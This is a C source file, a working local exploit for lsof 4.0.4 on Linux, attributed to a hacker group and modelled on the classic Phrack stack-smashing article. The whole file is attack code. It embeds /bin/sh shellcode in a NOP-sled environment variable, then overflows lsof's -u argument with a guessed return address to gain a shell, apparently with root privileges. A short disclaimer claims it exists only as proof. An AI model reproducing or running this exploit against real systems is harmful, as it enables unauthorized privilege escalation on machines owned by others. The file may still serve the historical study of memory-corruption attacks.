/*
 *
 *  Xploit for lsof 4.0.4 (Only tested under linux)
 *
 *  By:
 *          Zhodiac <zhodiac@jjf.org>
 *          - J.J.F. / Hackers Team - 
 *             http://www.jjf.org
 *
 *  Based on Aleph1's article at phrack49 called
 *            "Smashing the stack for fun and profit"
 *
 *   #include <standar/disclaimer.h>
 *   
 *   This xploit was coded "only" to prove it can be done.
 *  
 */

#include <stdlib.h>
#include <stdio.h>

#define OFFSET                            0
#define BUFFERSIZE                       32
#define EGGSIZE                        2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char comando[128],buff[BUFFERSIZE], *egg, *ptr;
  long *addr_ptr, addr;
  int i;

  printf("\nXploit for lsof 4.04 by Zhodiac - J.J.F. / Hackers Team - <zhodiac@jjf.org>\n\n");

  if ((egg=malloc(EGGSIZE))==NULL) {
          perror("malloc");
          exit(-1);
          }

  addr = get_esp() - OFFSET;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < BUFFERSIZE; i+=4) *(addr_ptr++) = addr;
  ptr = egg;
  for (i = 0; i < EGGSIZE - strlen(shellcode) - 1; i++) *(ptr++) = NOP;
  strcpy(ptr,shellcode);
  memcpy(egg,"EGG=",4);
  putenv(egg);
  sprintf(comando,"/usr/sbin/lsof -u %s",buff);
  system(comando);

}